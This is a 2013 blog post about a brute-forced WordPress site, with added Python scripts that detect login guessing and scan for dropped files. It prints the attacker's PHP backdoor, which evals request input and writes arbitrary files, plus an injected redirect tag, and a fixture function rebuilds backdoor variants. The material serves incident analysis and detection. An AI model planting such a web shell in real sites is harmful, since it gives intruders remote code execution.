
Wordpress Under Attack April 2013 - tips to remove spyware

Written by Michał Surowiecki, Sunday, 21 April 2013 22:03 - Last Updated Sunday, 21 April 2013 23:19

One of my clients' WordPress sites was brute-force hacked on 8 April. Bots scan for WordPress sites and try to log in with the 1000 most popular passwords, such as admin, 123456, qwerty or password.
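An added example, not part of the original post: the login guessing described above leaves a distinctive trace in the web server's access log, because wp-login.php answers a failed login with HTTP 200 (the form is re-rendered with an error) and a successful one with a 302 redirect into wp-admin. The Python script below parses Apache combined-format lines (constructed samples using documentation IP ranges, not the client's logs), flags any source that POSTs to wp-login.php more than a threshold number of times inside a time window, and reports whether a 302 appeared in that run, which is the sign that one of the guessed passwords worked.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" format: ip, identd, user, [timestamp], "METHOD path proto", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Return a dict for one access-log line, or None if it is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def find_bruteforce(lines, threshold=10, window=timedelta(minutes=5)):
    """Map ip -> summary for every ip that POSTed to wp-login.php at least
    `threshold` times inside any span of length `window`.
    WordPress re-renders the login form on failure (200) and redirects on success (302)."""
    attempts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if not rec or rec["method"] != "POST":
            continue
        if rec["path"].split("?", 1)[0].endswith("/wp-login.php"):
            attempts[rec["ip"]].append((rec["ts"], rec["status"]))

    hits = {}
    for ip, events in attempts.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # advance the window start until events[start..end] fits inside `window`
            while events[end][0] - events[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                successes = [ts for ts, status in events if status == 302]
                hits[ip] = {
                    "attempts": len(events),
                    "first": events[0][0],
                    "last": events[-1][0],
                    "success_at": successes[0] if successes else None,
                }
                break
    return hits


def _line(ip, second, method, path, status):
    # Constructed sample line (documentation IP ranges); not taken from the client's logs.
    return (f'{ip} - - [08/Apr/2013:03:14:{second:02d} +0200] '
            f'"{method} {path} HTTP/1.1" {status} 3927 "-" "Mozilla/5.0"')


SAMPLE_LOG = (
    [_line("198.51.100.7", s, "POST", "/wp-login.php", 200) for s in range(0, 44, 4)]  # 11 failed guesses
    + [_line("198.51.100.7", 44, "POST", "/wp-login.php", 302)]                        # 12th guess succeeds
    + [_line("203.0.113.5", 10, "GET", "/wp-login.php", 200),
       _line("203.0.113.5", 20, "POST", "/wp-login.php", 302)]                         # one legitimate login
    + [_line("192.0.2.9", s, "GET", "/", 200) for s in range(0, 60, 15)]               # ordinary browsing
)


if __name__ == "__main__":
    for ip, info in find_bruteforce(SAMPLE_LOG).items():
        verdict = (f"password guessed at {info['success_at']:%H:%M:%S}"
                   if info["success_at"] else "no success seen")
        print(f"{ip}: {info['attempts']} login POSTs between "
              f"{info['first']:%H:%M:%S} and {info['last']:%H:%M:%S}, {verdict}")
```

The threshold and window are tunable; a real site sees a handful of login POSTs per user per day, so ten from one address in five minutes is a safe alarm. Feed the script the raw log with something like `find_bruteforce(open('/var/log/apache2/access.log'))`, and treat a 302 at the end of a run of 200s as a compromised account, not just an attempt.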

The first sign of infection was a redirection to a Russian forum through a generated link:

http://smccoachhire.com//get.proxy2?t=phpbb_1_lom&k=14&c=10000&dir=::&host=www.smccoachhire.com&url=L2dldC5wcm94eTI/dD1waHBiYl8xX2xvbSZrPTE0JmM9MTAwMDAmZGlyPTo6Jmhvc3Q9d3d3LnNtY2NvYWNoaGlyZS5jb20mdXJsPUwyZGxkQzV3Y205NGVUSS9kRDF3YUhCaVlsOHhYMnh2YlNaclBURTBKbU05TVRBd01EQW1aR2x5UFRvNkptaHZjM1E5ZDNkM0xuTnRZMk52WVdOb2FHbHlaUzVqYjIwbWRYSnNQVXd5Wkd4a1F6VjNZMjA1TkdWVVNTOWtSREYzWVVoQ2FWbHNPSGhZTW5oMllsTmFjbEJVUlRCS2JVMDVUVlJCZDAxRVFXMWFSMng1VUZSdk5rcHRhSFpqTTFFNVpETmtNMHh1VG5SWk1rNTJXVmRPYjJGSGJIbGFVelZxWWpJd2JXUllTbk5RVlhkNlZXMDVXbFo2Vm5sVVJtaHpaRzFTVWxCVU1EMD0=

I got rid of this quickly by updating the WordPress engine. But then the hosting provider started suspending the service, saying that thousands of emails were being sent from this site.

I found that about 100 index.php files had been created in random folders, each containing the same spyware script but with different values:

<?php
$yaiwk = "0f545b048c89659aa0606c4e6cc2f161";   // per-file token; differs in every dropped copy
// remote code execution: whatever arrives in the 'taxcrg' request parameter is passed to eval()
if(isset($_REQUEST['taxcrg'])) {
    $nvuqsty = $_REQUEST['taxcrg'];
    eval($nvuqsty);
    exit();
}
// arbitrary file write: path taken from 'gumzvif', file contents from 'vsuxkaqx'
if(isset($_REQUEST['gumzvif'])) {
    $ksfekbs = $_REQUEST['vsuxkaqx'];
    $koodnfkh = $_REQUEST['gumzvif'];
    $kdapwkh = fopen($koodnfkh, 'w');
    $ordh = fwrite($kdapwkh, $ksfekbs);
    fclose($kdapwkh);
    echo $ordh;
    exit();
}
?>

There was also one main PHP file, called "dirs.php", which contains the paths and generated values of all the index.php files:


Some code was also added to the template.php file:

<META HTTP-EQUIV="REFRESH" CONTENT="0;URL=http://www.doctordeer.com">

SOLUTION:

coming soon...
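The post's solution section was never filled in. As an added example that is not the author's procedure, the Python scanner below walks a webroot and looks for the three artifacts the post describes: an index.php that evals request input and writes files from request input, the dirs.php manifest listing the dropped files, and a theme template carrying a meta-refresh redirect. It also computes a fingerprint with variable names, parameter names and the 32-character hex token normalised away, so that the roughly 100 per-folder copies, which differ only in those values, collapse to one family. The WordPress-like tree it scans is constructed in a temporary directory for the demonstration; the second variant's names and token, the plugin file and the redirect target in that fixture are made up, not taken from the compromised site.

```python
import hashlib
import os
import re
import tempfile

# Heuristics for the artifacts the post describes. REQUEST_ASSIGN is filled with a variable
# name to check that the value passed to eval() or used as a file path came from the request.
EVAL_VAR = re.compile(r"\beval\s*\(\s*\$(\w+)\s*\)")
EVAL_DIRECT = re.compile(r"\beval\s*\(\s*\$_(?:REQUEST|GET|POST|COOKIE)\b")
FOPEN_WRITE = re.compile(r"\bfopen\s*\(\s*\$(\w+)\s*,\s*['\"]w['\"]")
REQUEST_ASSIGN = r"\$%s\s*=\s*\$_(?:REQUEST|GET|POST|COOKIE)\s*\["
META_REFRESH = re.compile(r"<meta\s+http-equiv\s*=\s*[\"']refresh[\"']", re.I)
INDEX_PATH = re.compile(r"[\w./-]+/index\.php")


def _from_request(src, var):
    return re.search(REQUEST_ASSIGN % re.escape(var), src) is not None


def classify(src, name):
    """Return the list of reasons a PHP file looks like one of the dropped artifacts."""
    reasons = []
    if EVAL_DIRECT.search(src) or any(_from_request(src, v) for v in EVAL_VAR.findall(src)):
        reasons.append("eval_of_request")
    if any(_from_request(src, v) for v in FOPEN_WRITE.findall(src)) and "fwrite" in src:
        reasons.append("file_write_from_request")
    if META_REFRESH.search(src):
        reasons.append("meta_refresh_redirect")
    if name == "dirs.php" or len(INDEX_PATH.findall(src)) >= 3:
        reasons.append("manifest_of_dropped_files")
    return reasons


def fingerprint(src):
    """sha256 of the source with variable names, parameter strings, the 32-hex token and
    whitespace normalised, so per-file variants of one script hash to the same value."""
    s = re.sub(r"\$(?!_)[A-Za-z]\w*", "$V", src)   # $yaiwk, $nvuqsty ... -> $V (superglobals kept)
    s = re.sub(r"\"[0-9a-f]{32}\"", '"H"', s)       # the per-file hex token
    s = re.sub(r"'[^']*'", "'S'", s)                 # request parameter names
    s = re.sub(r"\s+", " ", s).strip()
    return hashlib.sha256(s.encode()).hexdigest()[:16]


def scan(root):
    """Walk a webroot; return {relative_path: {"reasons": [...], "fingerprint": ...}}."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            with open(full, encoding="utf-8", errors="replace") as fh:
                src = fh.read()
            reasons = classify(src, name)
            if reasons:
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                findings[rel] = {"reasons": reasons, "fingerprint": fingerprint(src)}
    return findings


def backdoor(token, params, names):
    """Constructed stand-in for a dropped index.php; token, parameter and variable names vary per file."""
    t, p, d = params            # request parameters: code to eval, path to write, data to write
    a, b, c, e, f, g = names    # variable names
    return (f"<?php ${a} = \"{token}\";"
            f"if(isset($_REQUEST['{t}'])) {{ ${b} = $_REQUEST['{t}']; eval(${b}); exit(); }}"
            f"if(isset($_REQUEST['{p}'])) {{ ${c} = $_REQUEST['{d}']; ${e} = $_REQUEST['{p}'];"
            f" ${f} = fopen(${e}, 'w'); ${g} = fwrite(${f}, ${c}); fclose(${f}); echo ${g}; exit(); }} ?>")


def build_fixture():
    """Write a constructed WordPress-like tree (made-up names and tokens) to a temp dir."""
    root = tempfile.mkdtemp(prefix="wp-scan-")
    files = {
        "index.php": "<?php define('WP_USE_THEMES', true); require('./wp-blog-header.php');",
        # eval of local data rather than request input: must not be flagged
        "wp-content/plugins/demo/render.php":
            "<?php $tpl = file_get_contents(__DIR__ . '/x.tpl'); eval('?>' . $tpl);",
        "wp-content/uploads/2013/04/index.php":
            backdoor("0f545b048c89659aa0606c4e6cc2f161", ("taxcrg", "gumzvif", "vsuxkaqx"),
                     ("yaiwk", "nvuqsty", "ksfekbs", "koodnfkh", "kdapwkh", "ordh")),
        "wp-includes/js/tinymce/index.php":
            backdoor("9b1c2d3e4f5a60718293a4b5c6d7e8f9", ("qzmrt", "hjwexp", "lnobvda"),
                     ("pqwu", "rtyhbn", "zxcvq", "mkjhgf", "uytre", "wsaq")),
        "dirs.php": "<?php $d = array('wp-content/uploads/2013/04/index.php' => '0f545b04',"
                    " 'wp-includes/js/tinymce/index.php' => '9b1c2d3e',"
                    " 'wp-content/plugins/demo/index.php' => '7a7a7a7a');",
        "wp-content/themes/twentytwelve/template.php":
            "<?php get_header(); ?>\n<META HTTP-EQUIV=\"REFRESH\" CONTENT=\"0;URL=http://example.com\">\n",
    }
    for rel, src in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(src)
    return root


if __name__ == "__main__":
    for path, info in sorted(scan(build_fixture()).items()):
        print(f"{path}: {', '.join(info['reasons'])} [family {info['fingerprint']}]")
```

On a real site run `scan('/var/www/html')` and remove every file sharing the backdoor family's fingerprint together, along with dirs.php and the injected META tag. Deleting the files does not by itself end the incident: the guessed admin password, and any users or keys the attacker created through the eval backdoor, still have to be changed.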


Links:


Hackers Attack 90,000 WordPress Blogs

Wordpress Under Attack: How To Avoid The Coming Botnet

How to Avoid Being Hit by the WordPress Attack

Hacking the WordPress CMS. Or Stopping Someone Who Wants To

WordPress blogs targeted by hackers (Blogi na WordPressie na celowniku hakerów)
